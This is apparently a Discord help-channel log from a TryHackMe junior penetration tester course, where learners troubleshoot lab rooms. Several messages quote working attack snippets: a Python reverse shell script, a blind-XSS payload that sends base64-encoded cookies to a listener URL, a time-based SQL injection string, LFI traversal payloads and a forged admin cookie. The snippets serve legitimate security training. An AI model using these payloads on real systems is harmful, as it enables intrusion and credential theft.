#junior-pentester-path

nevermind, found the solution! Simply had to change to a directory where I have rights to write in

so when i refresh the page again it doesnt take it to the admin page

Hi guys and ladies. Can you recommend any good free vuln scanner? I tried nmap scan and will do it one more time but if there any options?

there's a free version of Nessus

@amber scarab thank you

Gave +1 Rep to @amber scarab

Guys and ladies, is it possible that nmap can't find open ports with different types of scans however I know at least HTTP/HTTPS port had to be opened? What can I do in this case to detect open ports?

python3.9 is not working ?

@buoyant sapphire What is the output, if you run command python3 -V on kali? Is that version not suitable for your needs?

Does Nmap propably see the port as filtered, and which machine are you scanning? You can at least try to figure out the reason Nmap says the port is not open or is filtered, by scanning that port specifically and using a flag --reason. I'd suspect the port is interpreted to be filtered and therefore not shown in a basic scan. 🙂

3.11

Could you use that version? Like

python3 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

I'd think Impacket scripts would work with it.

No it gives the on lines in python code

But in the room it is the same code

Perhaps the script would have to be executed as super user rights, if you're binding the smbserver to port below 1000?

I am already running as a root user

Ah yes.. Are you using your own Kali or an attack box? Just checked the attack box and saw that it doesn't have impacket directory at /opt/impacket/. 🤔

@buoyant sapphire Would this work?

impacket-smbserver -smb2support -username THMBackup -password CopyMaster555 public share

I try to do fast scan with nmap on my own lab. For different types of scans like Xmas, Null and Stealth SYN I see only
"Not shown: 100 open|filtered tcp ports (no-response)".
I expected to have shorter list of ports can be probably opened as we can't guarantee if port open by those scans.
Very first idea to come up is to limit number of ports need to be checked by vuln scanner.

Considering the Xmas and Null scans, it is good to remember about those, that they can only tell you wether the port is open|filtered or closed, not if the port is open for sure. 🙂 Since this is about your own lab, you can DM me about it, so that we can leave the channel for topic of Jr. Pentester path. :)

Actually last Stealth SYN scan gave me one open port so nothing wrong with nmap it just mean that I have less experience to use it. Thank you.

Gave +1 Rep to @tulip torrent

Yes i am using my Kali, the directory is available in that location

@buoyant sapphire If you want, you can DM about this if you still have the problem. Sounds like eyes on the terminal could help figuring this out. :) I got quite a bit interested about this.

Whom do I have to DM. and you completed the jr pentester testing path ??

You can DM to me in Discord, though I have to say I'm not staff of THM. I'm just a subscriber wanting to help other people. Quite almost, I'm missing few last steps on Win Priv.Esc. I did however try the problematic phase with attack box and successfully managed to launch the Impacket SMB server. :)

Hello, I am doing linux privilage escalation: Cron Jobs. The problem: I am not getting reverse shell. The things I tried: create test.py in tmp directory and change backup.sh in karen home folder. Just as a test I ran it and it looks like syntax is correct since im getting reverse shell (ofc not as root). What could be the problem?

nvm solved it its because I didn't mark it executable

The LFI Challenge 1 is kicking my ass. Everytime I use BurpSuite to send a request to change the POST I don’t see the flag. What am I doing wrong?

If I remember correctly I used curl to send POST

@fossil lake Are you doing the File Inclusion room, Task 8 Challenge and trying to read /etc/flag1?

Has burp suite been redesigned in the past few years?

Yes

Just trying it out, managed to get /etc/hosts and such files but not the flag. Just thinking there could be a target machine side problem, though I cannot be sure. Or the flag1 is intended to be achieved in different way.

E: Got it. Lol got my way into terminal on that machine before I realised I was looking at the wrong page, heh.

@fossil lake

So, you're at the page /challenges/chall1.php right? I'd suggest trying || to send the POST request from browser, by manipulating the form on the page || :)

Ok and how do I do that?

I suspect that the reason why only changing the type from GET to POST on BurpSuite may not work, is that if you intercept a GET request (and change get to post in text), it does not contain a very relevant thing for the web server backend: the header Content-Type: application/x-www-form-urlencoded.

You can open your developer tools on the browser (iex. right mouse click the web page and select "Inspect", or press F12 on keyboard). Find the form in the HTML source code and change the relevant thing there. You'll find a n ||HTML form element that contains attribute with value of "GET"||.

hi guys, I'm doing the Metasploit Exploitation room and I keep getting this message. Did I miss something ?

There sometimes can be problem when using windows paths with meterpreter, as \ may be interpreted as an escape character. Try using double backslashes \\ instead. :)

gg, that worked. Thanks. I'm so dumb in windows haha

Ok thank you

Gave +1 Rep to @tulip torrent

@tulip torrent IT WORKED THANK YOU

Gave +1 Rep to @tulip torrent

@tulip torrent Yeah, ty! I used to much of my time in burp for this lol

hey guys, nice to meet you all!

Hi, starting this today !

I'm wondering does the Practical example (BLIND XSS) on the last task 8 bugged or something ?

even in Attack the box still did not receive any encoded cookie on the netcat terminal ):

cuz I try from my own vm and the THM machine same issue

Hi, anyone got idea how i can change my name that's on my certificate? @tiny bluff

😆 cheers mate. it would be my last resort.

Well, that is your option, other than creating a new account and doing it all again.

Hi guys nice to meet everyone

Just finished lfi rfi

The file inclusions challenge really burned me

😅

It really was tough task

👍💪

hey guys, im doing "active reconnaissance" task 6 netcat, but i dont get any response by the terminal when using nc ip port on my vm else on the attackbox, any ideas?

ok, seems like i overread the question and tried port 80 insteat of 21... ^^

Hi everyone, I have some issues with the task5 Linux Escalade,
When I have uploaded the exploit "37292.C" and compile it gcc 37292.c -o Ofc
I have a message error, i really don't understand, someone can help me ?
Thanks

Did you compile it on your kali VM or on your target? If on your kali VM, the gcc version in it may not be compatible with the gcc version on your target.

Thanks a lot for your response, i compile it on my kali vm

Gave +1 Rep to @prisma raptor

So like you said it's better if I compile it from the target like that I'm sure that I have the same version of gcc?

That is correct. You can also check if gcc is installed on your target first, otherwise, you would have to look for another exploit.. or look for something written in python or any other language for that matter

socat is so confusing with the many syntax. gosh

Hi guys and ladies. Any useful tricks for blind XSS? I mean what can I do to research and get something valuable from web form susceptible XSS vuln? Maybe useful tools like XSSHunter can help? Or you found GitHub repo with useful payloads?

So I'm kinda confused about SSRF Task 2, I managed to get the flag but I'm not really sure why this particular appendage to the url for the attack works, could someone please explain to me why this results in the flag?

Any one could explain me task 4 from "Authentication Bypass". I followed the steps and get the final flag. But I don't understand how will I know when there is this kind of vulnerability. I mean, how do I know there is a PHP variable $_REQUEST which is used to send the reset url?

Second question. If the final step is a POST request, why the curl is not using the -X POST method?

For your first question : The use of the $_REQUEST variable in PHP is not in itself a vulnerability. The vulnerability arises when the application does not properly validate or sanitize user input that is passed through this variable. To identify this kind of vulnerability in an application, you would need to perform a thorough security assessment of the application.

For your second question : The curl command used in the challenge does not specify the -X POST method because curl defaults to making a POST request when it sees the -d parameter, which specifies the data to be sent in the request body.

There is a pretty good tool, which is an extension that can do a lot of stuff : https://github.com/LasCC/Hack-Tools

Thanks, I'll try that

Gave +1 Rep to @gray nimbus

can someone help me with this

./code: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./code)

if i remember correctly, best way is to use attackmachine in that case

ok

thanks

it's issue with compatibility on local VM. the THM machine is set up to that work

will try now , thanks

np

Good day guys and ladies. In Jr. Pentester Path was mentions about quite sophisticated Nmap scans technique called Idle/Zombie scan but I'd like to have deep dive to it. For example I can't find answers to my question like 'how to find zombie for this scan' or 'is it possible to combine zombie scan with decoys'. I appreciate any useful article about this topic.

Hi. Got an issue in Metasploit: Exploitation, task 2. What can I do? I set the right RHOSTS parameter and I got an error. What's wrong?

Hi.In net sec challenge (social engineering ftp password)this task is taking a long time and it's still running

What do you mean?

Can you link the room & task.

Task2

Netsec Challenge

are you on VPN or attack box? have you tried running msfupdate ? I just tested it on the attackbox and it worked as expected from there

Attackbox

Will terminate and restart it again

I use attack box and I ran msfupdate. I tried three times. I don't understand

What command are you running

hydra -v -l usernamefile -P passwordfile ip ftp -s portno

yeah that is odd! I'd try the good old turn it all off and on and try again.

That's what I'm doing.

Username file? You don't need a file for the usernames, they're already given to you, you just have to try them both

I have put the two names in a text file😅

Oh okay, I believe the flag when you use a file for the usernames is a capital letter -L

Thanks

Got the password

Great 🙂

💪👍

I found, by using a second prompt. On the first I only ran msfconsole and msfupdate. On the second I ran msfconsole (no need to update), and then the search, the RHOSTS set and it worked.
2 or 3 hours on that problem.
Anyway, thank you for having tested this command on your side.

Gave +1 Rep to @amber scarab

so frustrating when a bug causes you a problem - glad you got it sorted!

Hello guys I hope u all doing fine

I just want to know does anyone finish the SQL Injection and the task8 to be more specific?

I learned a lot today (;

but I still struggle in the task 8 ):

I found the schema table and the table name

and that is what I wrote to find the COLUMNS schema(name)

' UNION SELECT SLEEP(3),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA= 'sqli_four' and TABLE_NAME = 'analytics_referre_s' and COLUMN_NAME like '%';--

but it says OK ! even tho I did not defined the first letter after the COLUMN_NAME like '%';--

I doubt about table name. More logical name will be analytic_referrences. You can do back one step and try to retest table name first.

Hey, Has anyone completed the Pentesting tools series? I'm struggling with John the Ripper > https://tryhackme.com/room/johntheripper0 < I can't seem to get John the Ripper working in Linux debian 11 so my only option is to use the Attackbox on tryhackme, is this possible? we are asked to download the hash.txt files and I can locate the files easily on my personal computer using Linux but I'm thinking about how do I locate the hash.txt files using Linux in Attackbox via tryhackme.

ultimately they're just .txt files (most of them), you can just copy the contents of each file into a new file on the Attackbox

if you're subscribed you can start a python server on your Linux machine, and use wget to transfer the files to the Attackbox

Are you referring to the Attackbox that requires a subscription to start a python server?

yes

but it would be the opposite in this case? server on the local machine and they could get the files that way

Hello guys ! I have a question in the room File inclusion > Challenge > flag3. With the command curl, i find the flag, but in using the inspector of firefox, it doesnt work. How it is possible ? In the 2 cases, i do the same ( sending a post request)

That's a good idea, I'll give it a shot. Thanks 👍

Gave +1 Rep to @zealous dew

Hi guys just at the end of the course .can you guys suggest me for some practice after the Jr pentester course

Any boxes,machines or a list

What path should I pursue next the Red Teaming or Offensive ? I just finshed the JR pentest

I just came in to ask this Q too lol I will finish this room this month 42% still 58%

yep I was thinking like u but it display false token when I write analytic_referrences ): I search for the way to solve it but they all just show the answer not the method of how to do it.

• sometimes if it's not always when I write _ it says true and IDK why (:

I think task 8 in SQLi have some logical error but I need to understand it ):

hi, I'm in the content discovery room on the jr pentester path, and the attack box is giving me an error 405

unsure if I need to be here or if I need to be tech support

Hi! I'm on Wireshark 101 and I'm doing Task 12, which is HTTPS Traffic. The last question,What is the User-Agent listed in packet 50?, won't let me put in the the answer in the correct format. I found the answer on online but the format is different from the answer box. Do anyone know the correct answer to that question?

Are the Nmap and hydra rooms in CompTIA redundant if you've already done junior pentesting?

they are different

@amber sail if you inspect the page at the answer box, usually you can find evidence of the formatting of the answer but you have to dig in there a bit. Also the hint box sometimes shows what format it expects but if you're asking, you probably tried that already.

Tr\here's no hint to this questions. I googled the question and got the answer but it don't fit the format of the answer in the answer box.

Anybody have any suggestions on how to consistently access or at least fix the victim IP address when completing rooms? For example, I'm having issues with the LFI room (https://tryhackme.com/room/fileinc) and every time I spin up the machine and attackbox, I still can't get the IP address of the machine I'm supposed to attack, even after a refresh

In this particular room, the link in question is http://webapp.thm/get.php?file=/etc/passwd . I'm waiting for the domain "webapp.thm" to change to an IP address, but it doesn't. Even if I type as is in the firefox browser, it times out as I expect it. So I assume that the domain is supposed to change to an IP address. Am I wrong?

that's only an example, the machine to deploy is in task 2 and this is the link that will change to the IP

Oh I see! I got it now. Previous rooms provided the Machine IP as you go, so I was stuck for awhile thinking there was a bug or something. Thank you!

Gave +1 Rep to @zealous dew

You're welcome 🙂

Hello! Just attained my Jr. Pentest Cert from THM. I have a solid background in IT and I'm looking to take my skills to the next step. Would I go for an industry standard cert like CEH or would I start looking for real world experience, and if so how?

So I'm doing Linux Privilege Escalation, Task 5

I've gotten to the point where I transferred the kernel exploit from my local machine to the target machine, and now I need to convert the file with the gcc command. I do that and I get a huge list of errors that are within the exploit itself. Is this supposed to happen? Am I supposed to debug the entire exploit source file, because I'm not at that skill level lol

Or is there something going on?

The syntax I'm using is:
gcc exploit.c -o exploit

I figured out what was going on

When I ran wget on this exploit-db page, I wasn't importing the actual exploit, I imported the source code of the webpage itself. So the exploit wasn't working when I was trying to run it. Replaced the web source code with the exploit source code on exploit_db and it worked

Mistake made, issue resolved, lesson learned

what is the correct value for the cookie?

Hi! I don't remember, sorry!

Hi guys Im doing linux PrivEsc module and currently on the NFS section. Im trying to run my compiled binary from the mounted directory and it says that the glibc version that is used to compile the binary (GLIBC_2.34) is not found

Hi Guys. I'm stuck in What the Shell room, task 13, Question 7.
I have to login over RDP. But I have no idea to achieve that. Could anyone help me?

Have you looked at Remmina or xfreerdp?

I think that is Task 8 as 7 is getting a reverse shell using Powershell

Well I have searched on the net and found Remmina or xfreerdp. So you advice me to install Remmina on the my attack box?

It seems there is a mismatch between the gcc version in your kali VM or Attackbox with the gcc version in your target.

I've done the reverse shell by Pwoershell. But I d'ont know how to login

Did you try to compile it on your target instead

Compile what?

This was for @tawny salmon

Sorry

To clarify, you're on Task 8 right?

If you are, you need to install Remmina on your kali VM, I think this is already pre-installed on the Attackbox if I remember correctly

No task 13, 8th question

I created a user with the revere shell and I don't know how to process the login

You can use Remmina (GUI option) or xfreerdp (CLI option).

Ok, but where shall I install it? On my attack box shell? On the reverse shell? And then how do I run it?

I checked just now and you can find Remmina in the Attackbox - /root/Desktop/Tools/Miscellaneous directory

Or if you are in your kali VM, you can find install instructions in Google.

Great. And where should I run Reminna? And how?

It's pretty straight forward, open Reminna and enter the ip, it will then ask for the credentials

Thanks. I will try

Gave +1 Rep to @remote iris

@remote iris Pretty straight forward, I agree. Thanks a lot. I worked.

Gave +1 Rep to @remote iris

@prisma raptor Thank you for your help. I logined sucessfullly

Welcome, glad I could help.

authentication bypass module ffuf

I specified -u but it keeps giving me this error

Question. After doing the last question of Cross-Site Scripting (Practical Example (Blind XSS)), in the final task you have to insert this xss:

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

And stay listening in netcat: nc -nlvp 9001

Question is: Why this only work when you do it in an attack machine and not in my own VM? I was not able to recieve any request to my Netcat in my VM (in attack machine yes). So I would like to understand why because in the real world I wont use the attack machine

I find this path a bit weird as somehow it requires you kinda know burp suite and some other things before you get to that part ^^

It's something to do with the subnet of your VPN.

For example, I'm able to do it on my VM.

doing the complete beginner pathway would benefit you if you run into things you don’t know prior to the module

well it's ok. I've done all of that in a faraway past. Just seemed a bit "off" within the course

Hi everyone!

Is someone there who has already finished this room?

This is a channel dedicated to the path.

If you need help with specific room, just ask

Actually a have a couple of questions

1 RFI / LFI challenge 3. I couldn’t use null byte. Which way should be right?

2 What is the best way to improve knowledge after theory?

what have you tried exactly? null byte should be part of the solution

Unfortunately it didn’t work

Neither %00 nor 0x00

I changed type of request to POST, and put data in text field

Browser url could send only GET

try burp

Burp is the next level)

alternatvely, it can work from the dev tools

I have finished that with RFI, but it seems to me it should be LFI

How can dev tools help me avoid .php?

dev tools can help you edit the request to POST and make sure the nullbyte is sending correctly

As I mentioned previous, I had changed request to post, but null byte still did not work

how did you change the request?

Inspect page, in input

Maybe I should do something else?

what's probably happening is the % in the nullbyte is getting url encoded to %25
after you send the request, have a look at it in the network tab in devtools. if it ends with %2500 instead of %00 then edit and resend the request deleting the 25

Thank you, maybe it is

By the way, null byte works only on old php versions. Don’t you know if there way for a new one?

Or maybe another approach?

I was just wondering the same thing after seeing that note in the exercise, but the answer is out of my league for now 🙂

Php compiler or pure c Lang should know the answer, maybe later I will do a little research

it seems I have found

are you talking about the RFI? Yea i noticed that i had to change the form to post in the dev tools and then edit the target url in burp.
changing it to "post" in burp basically is too late as there's a difference in how your browser sends a get / post request

the "why" behind this i don't understand myself

tried to look for some explanation online, and i came across some write-up of the room where they changed all the settings in burp...
So i'm guessing maybe browser behaviour changed in the meantime or something ?

I think the problem was in browser encoding. I still have not started burp using

oh yea probably then as well

because if you add it to the url-bar, it will be a get request

Even with post null byte didn’t work

myea burp then

or postman i guess even

but burp will be easier

It sounds interesting… I will learn burp soon

I'm trying to create and than print out the cookie, but somehow cookie is not even created, I can't see it both on the page and in devtools🤔

<html>
<head>
    <script type="text/javascript">
        document.cookie = "username=John Doe; expires=Thu, 31 Dec 2023 12:00:00 UTC";
    </script>
</head>
<body>
    <script>
        window.alert('XSS'); //this works
    </script>
    <h1>COOKIE:
        <script>document.write(document.cookie);</script>
    </h1>
</body>
</html>

What am I doing wrong?

Did you try to do that I header?

In header I mean, dev tool

By the way, as I remember, there has to be entry point in JavaScript, like document.load event

Hi there, i am having the same issue with the IP http://MACHINE_IP/about/2 on Task 8 - Extra Mile SQLi with Repeater of BurpSuite: Repeater
could you please give it a view / thank you in advance

@shadow echo

Done!

what the problem here

i have added the user but cant rdp with that username and pass

do they have enough rights?

being able to create a user doesn't mean they can rdp

also .. isn't it administrators ?

in stead of administrator

it is ....

Time to learn red stuff. Hopefully everyone's enjoying this path. I basically know nothing about red team things so I'm excited to be here and learn everyone here. I'm grateful I'm on the junior pentester path with you all.

The good question is what can I learn after Jr. Pentester Path?

@tranquil citrus Do you mean generally, or like which path to go after Jr. Pentester?

I mean which path it's possible and will be good to enroll after Jr. Pentester.

I've been thinking which path to enroll next.

@tranquil citrus Well, that depends on what you would like to learn and where you want to head to in the field of cyber security. I think many people enroll to Red Teaming or Offensive Pentesting after Jr. Penetration Tester path.

Red Teaming, as the name implicates, provides information about Red Teaming and a bit from the perspective of cyber security exercises too; How Red Teams act, what is the purpose of Red Teaming, how to plan RT exercise, and teaches many techniques used during those exercises.

Offensive pentesting on the other hand is about attacking different kinds of targets and has challenges for buffer overflow exploitation.

Something those paths have in common, is the Active Directory module. About those buffer overflows I've got an impression that if you don't have experience about them, they may be a bit tedious task.

Go with whatever you feel is interesting or supports your goals in cyber security. 🙂

@tulip torrent , thank you for description

Gave +1 Rep to @tulip torrent

Congrats me, I finished Jr. Pentested Path.

congrats! 👏👏👏

Thank you

@tranquil citrus how long it has been?

It took me around 2 months but with 2 weeks of vacation when I do nothing on this course. I went quite good at the beginning but slowed down on Priviledge Escalation. This is probably my worst domain of knowledge now.

Thank you

I am stuck on burp suit, lately I have too little time (

https://tryhackme.com/resources/blog/jr-pentester-interview-guide
Fun to mention 😀

I am also on Burp suite section so far probably my favorite as of now.

Why is it your favourite?

@merry night QA wise, I have an issue with one technical question in this. Decrypting an NTLM hash?

hello

i need help

and i can't upload the picture !!

You need to verify your discord account first

!docs verify

the message box in the bot

don't appear to me

i see only the note.

Ah you must have turned that off in settings
But here you go:
https://help.tryhackme.com/en/articles/6495858-discord

^

Hello guys, i have a pb in "Vulnerability Capstone". I cant run the exploit, when i do python exploit.py (IP/--help). Someone can explain me please

Hello guys, I am doing the "Linux Privilege Escalation" box and in Cron jobs section the backup.sh worked fine after I made it executable. But using the /tmp/test.py is not working. I created the test.py with following content and made it executable.

import socket
import os
import pty

def run_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("IP", PORT))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn("/bin/sh")

if __name__ == "__main__":
    run_shell()

But not getting the shell?

You should specify the IP and port

What error message do you get?

Whats the error?

Its ok, it was a problem of compatibility with python3. I didnt anderstand everything but its work

I suppose that the script is too old

Module: introdution to web hacking
Section: Subdomain Enumeration
Task 6: Virtual Host

I tried using the provided code template "ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP" but didn't get the expected result. If someone has already done it, please help me

what are you getting? I assume you started the machine from task1 and used the machines ip and not http://machine_ip/ ?

Yes, i used the machine ip (ex: 10.10.23.12)

What it return?

can you see ffuf doing anything? does it list thousands of subdomains or nothing at all?

Hi, I'm stuck on the very last question in https://tryhackme.com/room/fileinc - I'm supposed to use RFI, but can't manage to make it include remote files. It doesn't even try to access them. Would appreciate some guidance here

That's obvious, I replaced the IP and Port before sharing here.

hi guys, I am going last task in XSS block, so I am entering in text box "</textarea><script>fetch('http://localhost:9001?cookie=' + btoa(document.cookie) );</script>" . But nc doesn't receive any request, tho is I will open the ticket - I will get my cookies. So I can say that script is correct. How did you solve this task? I use machine, offered in the task.

if someone else (like the admin) executes your xss they also call it with http://localhost:9001. However, this is their own localhost and not yours.

make sense. but which url I have to call then?

the ip of your own machine

or well the attackbox if you are using that

what have you attempted so far?

I am doing the task 11 (Linux priv). Now, when I am running the thm on the karen machine it is giving this error

./thm: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./thm)

How do i solve this?

Hello everyone! I have a stupid problem in BS module, “Practical example”. I have used both usernames and passwords list, pinchwork type, but I got the same content length (674). No exceptions. What did I wrong?

I am not sure, but main signature looks weird. It is expected to have *argc ( count of arguments) and *argv ( arguments) pointers. You had better to check it

Pure c is very difficult language)

Saw some walkthrough videos and they did the exact same thing. But I am getting this error.

Code is fine I guess.

1 could you show your error?
2 maybe you also have to compile this in binary with “make” command, and start like “./thm “?

I can be wrong, I have been studying pure c about 9 years ago

It is compiled

It's a dependency issue

@shut stirrup Your attacking machine and your target aren't close enough, they're using different glibc versions. You can compile statically, or compile on the target machine, or spin up a VM with the same version to compile on

target machine does not have gcc. Will spin up the Attack box. Hope that works

Maybe you can help me with my trouble?

I cannot

Thanks, used the AttackBox and it worked fine 🙂

Gave +1 Rep to @idle bison

Reboot solved my trouble

More or less everything that I did in the previous labs in that room. I've spent hours trying to understand what works and what doesn't. So far I know:

1. using http:://machine_ip/[whatever here] works, but not https
2. replacing machine_ip with localhost above works too
3. I get a different error msg if I try to read a directory that exists, so I know that etc/php/ exists but haven't been able to drill down further to find the php.ini
4. So far no success at all on attempting to access a file outside its own network. From what I can tell, it didn't even make such a request

it has listed thousands of subdomains @@

I came for a question, I did not have to ask... Thank you 🥲

Gave +1 Rep to @shut stirrup

In that case you need to tell ffuf how to detect if it is a real hit or a “this subdomain doesn’t exist”. Look at the mentioned -fs option for example

That task is about remote file inclusion, so they want you to point somehow point to a file on a different server, how have you tried doing that, what did you point it to and how could you tell it didn’t work?

I set up a file on host server, tried both with a txt-file (with php code), and .php-file that would execute already on my server so I'd be notified if it was accessed. It wasn't

I still don't understand very well, can you give me an example and the byte size after -fs

If you let the command run and look at the thousands of subdomains it’s spits out it tells you in the same line what the size of the response was. The assumption is that the size is the same for all incorrect subdomains and different for correct ones. So if it says response size 302 you can put -fs 302 to not display any results with that size

That should work fine then, can you maybe send a screenshot of what you are putting in the playground input field? Maybe you are using the wrong ip address and the server can’t reach it

I was using a domain, not IP...and I've tried with several other domains too (not owned by me) - none of them are fetched

oh, you are supposed to host it yourself on the attack machine that is in the same vpn as the vulnerable machine, the vulnerable machine might not even have real internet access

Thank you very much, I have completed it!!!

Gave +1 Rep to @restive sage

oooooh! although it did have internet access unlike many other machines, so I though it was supposed to be like this

ah, the vulnerable machine... got it, I should have connected the dots. makes so much more sense now

thanks a lot! 🙂

Module: Authentication Bypass
Task 5: Cookie Tampering
Question: What is the flag from changing the plain text cookie values?

Based on the information "Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/", I decoded the base64 and obtained {"id":1,"admin":false}; I modified it to {"id":1,"admin":true} and encoded it back to base64, resulting in "eyJpZCI6MSwiYWRtaW4iOnRydWV9". However, when I used the command: curl -H "Cookie: session=eyJpZCI6MSwiYWRtaW4iOnRydWV9" http://10.10.153.107/cookie-test, it still says "Not logged In". Can anyone help me?

hi everyone,

i have some issues with task 11 Linux escalade ,

"./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)"

I have understand that i need to update GLIBC (on my machine) or have the same version than on victime machine.

But how can i have the same GLIBC ?
I can't create my file directly on share because i can't compile it
there is something i don't understand someone can help me ?

Thanks

the easiest way is probably to just use the AttackBox instead of your own PC/VM to compile or compile on the victim machine if that one has gcc available

maybe try curl --cookie "session=abc" instead of going via header? or set it manually in the browser

okok i ll do it with attackbox it's easier for me
thanks a lot for your help

Hi everyone!

I am discovering Barp suit Intruder, an I have no idea about the next:

• when did we get param for “loginToken”? GET /login/admin doesn’t have the one. So what do we get to replace in post?

• as was mentioned, if we had response at the same page, we could use recursive grap. In which way? From where we had to extract them?

Looks like I get answer for first question

Also I have noticed that in results, sessions cookies are changed only in response. Not on request. It’s a bit strange for me

Hi, everyone! When starting as a beginner pentester, is kali Linux image suitable or should I use it as a main OS? Thanks for replies!

It is possible that the lesson's information is incorrect, based on the information provided in the 'Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/' statement. I tried using the command 'curl --cookie "session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==" http://10.10.x.x' and the result was 'Not logged in'

Maybe I’m mixing it with another room but do you maybe have to change the id too?

Have you been taking notes?

The cookie is persistent; I tried refreshing the provided ID, but the issue remains the same. Could this be an error caused by the lesson?

I remember doing the lesson and I don’t think I had any problems

I think I set the cookie manually in Firefox and refreshed and that was it

@bright cipher the worst thing to do when you learning is to think about the time lost

Note takingreally saves time in the long run, not only do you retain more but if you have forgotten something it's much faster to refresh your memory by looking at your own notes than going back through entire lessons or videos to find the key information. It's also good practice for actual pentests where you will will constantly be taking notes as you work.

But keep in mind, this is a very complex field - watch videos of people who are excellent at this and you'll notice them forgetting or making mistakes on common commands. No one expects you to have everything 100% in memory. The key is to understand the main ideas and know how to find more information efficiently when you need it. Also, don't forget that it's not unlike learning a language or a sport- practice, practice, practice. There simply is no quick and easy to getting good at it.

I remember being surprised early on by the suggestion of watching a walkthrough of a box and then doing it on your own a few days later. It felt like it would be far too easy after just a couple of sleeps to repeat what I had watched someone else do. Oh how wrong I was. 😄

In short, I think one key to protecting your mental health is managing expectations: learning this is difficult but doable, it will take time, focus on what you have learned instead of what you have forgotten, and be kind to yourself.

I've noticed alot of rooms re-address content you've done before as well, so no need to get too anxious about memorizing every little thing

I tried manually installing cookies on Firefox, but I can't seem to find the 'Add Cookie' option in the 'Storage' section of the 'Inspect' tool

I'm not sure if you ask for this but 'plus' button allows to add cookies value for particular website.

I have tried the following steps, but still couldn't succeed (How can I send images? I am unable to upload images here)

You may verify first to upload images

I have added the cookie but still cannot log in. Could you please take a look and help me troubleshoot?

you are doing Authentication Bypass - Cookie Tempering, right?

That's right, and Question:
What is the flag from changing the plain text cookie values?

you are too far then, you are supposed to set the cookies from the beginning of the section without any base64 stuff

base64 stuff only happens in the 4th question

I still don't quite understand the process. Do I need to use a similar command like 'curl -H "Cookie: {"id":1,"admin":true}" http://10.10.117.136/cookie-test'?

the solution is basically already in the lession in the CURL 3 box

you can use curl or set the two cookies in firefox directly

So, are you implying that your intention is "curl -H "Cookie: {logged_in=true; admin=true" http://10.10.117.136/cookie-test"?

without the {

Great!!!So, it's actually simpler than what I had been thinking. Thank you very much, love you

yea you were trying the harder thing already lol

Module: File inclusion
Task 8
Question: Capture Flag3 at /etc/flag3

I changed the method from 'GET' to 'POST', but I'm unable to remove the .php extension. Could you please take a look and assist me?

try doing it with burp, if you do it like this the %00 gets urlencoded to %2500 and wont get rid of the .php anymore

But before learning Burp, do you have any other alternatives to remove the .php extension in this case?

you can do it with curl too

its just when you do it like you are doing now you are actually sending %00 instead of the null-ascii character that %00 is supposed to represent

So, are you implying that your intention is 'curl -b "THM=admin" http://10.10.49.209/challenges/chall3.php'?

=> 'curl -b "THM=/../../../etc/flag3%00" http://10.10.49.209/challenges/chall3.php

-b is for cookies, you should look up the two parameters needed to send a curl request as POST and how data is sent by curl when using POST

or you can send the post request in firefox, find it in the network tab and then rightclick -> copy to curl

I have tried again and received the result as

you probably have to url encode your post data (make sure not to url enocde the %00, that is already encoded) and then set the Content Type header to let the server know it is url encoded.

I don't know how to proceed anymore 😢

Do %00 instead of %2500 at the end of your data and that should be it

it's still not successful

Hey guys and ladies!
Have you ever saw that nmap discovered same quantity of ports but every time with different port numbers on Stealth SYN scan?

Can I start doing machines right away or should I complete the Junior Pentester learning path first?

Its depends on your approach or preference, but you can work directly on boxes or rooms of your choice.

Well then. Maybe I'll try some later this day. Thank you. 🙂

question: im into the net sec challange in network security, question:

How many TCP ports are open?

i would say 5

What did i wrong?

by default nmap only scans the 1000 most commonly used ports.... but there are 65 535 ports and therefor a huge chance to miss some if you do not scan all ports.... look into the -p option for nmap

@sage current ok ty

Gave +1 Rep to @sage current

so i should scan -p 0-65535 to do not miss one?

yeah or -p- which would scan all ports

still seems like you found the missing one now

there is also the nmap min rate option or the -T4 or -T5 to speed it up

yes, other question: there stand "65530 closed ports" but they show 6 open ports, so there should be 65529 closed ports, or not?

or do i have a missunderstanding? ^^

@sage current ty

Gave +1 Rep to @sage current

well in your first image there is only 5 open ports... the correct answer is 6 which you can see in your second and last image

Hey, Im on Linux Privilege Escalation : SUID, and nano should have an s-bit set so I can read /etc/shadow etc, but it hasnt...

Did I miss sth?

yes, nano is only an example, you have to find the correct binary yourself on the machine

ah ok, thanks :)

Hello i need help Authentication Bypass task 3 . I dont get the usernames and passwords

0

how did you make the username list? I just tested it and it worked fine if I made the username list manually, but if I tried pipping it from the ffuf results, as the directions indicated, it got messed up. opened it in nano and sure enough even though I thought I used "cut" to clean it up nicely when I pipped it, there was a ^[[2K before every username

which didn't show when I used cat to check the list

The valid_username.txt should be the previous step results, there have four names and Separate is : admin/robert/simon/steve , so you can cat valid_username.txt checkout this.

Hi..could u help me guys..
When I try to connect with shh tryhackme@iptarget, there is "permission denied (publickey)"..

what room and exercise are you working on?

Jr pentester/content discovery

It result the same when I use shiba1@iptarget

I don't see anywhere in those modules where you would need to use SSH

are you trying to connect from a virtual machine ?

BURP SUIT QUESTION --- Hi, can somebody please explain to me how exactly do I read the Burp Sequencer output? The whole graph thingy and the stuff about bits and stuff. Thanks guys.

Aaahhh... I see..
Youre right... 😆

OWASP Juice Shop | Task#6: Question #2: View another user's shopping basket!: I have changed the parameter to basket/2, even though I could see other user's Rasberry juice order, but the flag is not appearing, I tried to relogin to admin account, but to improvement

*no improvement

Bruh i feel like this is a rabbit hole the creator intentionally did
in Windows Privilege Escalation -> Abusing vulnerable software

hooray complete this path

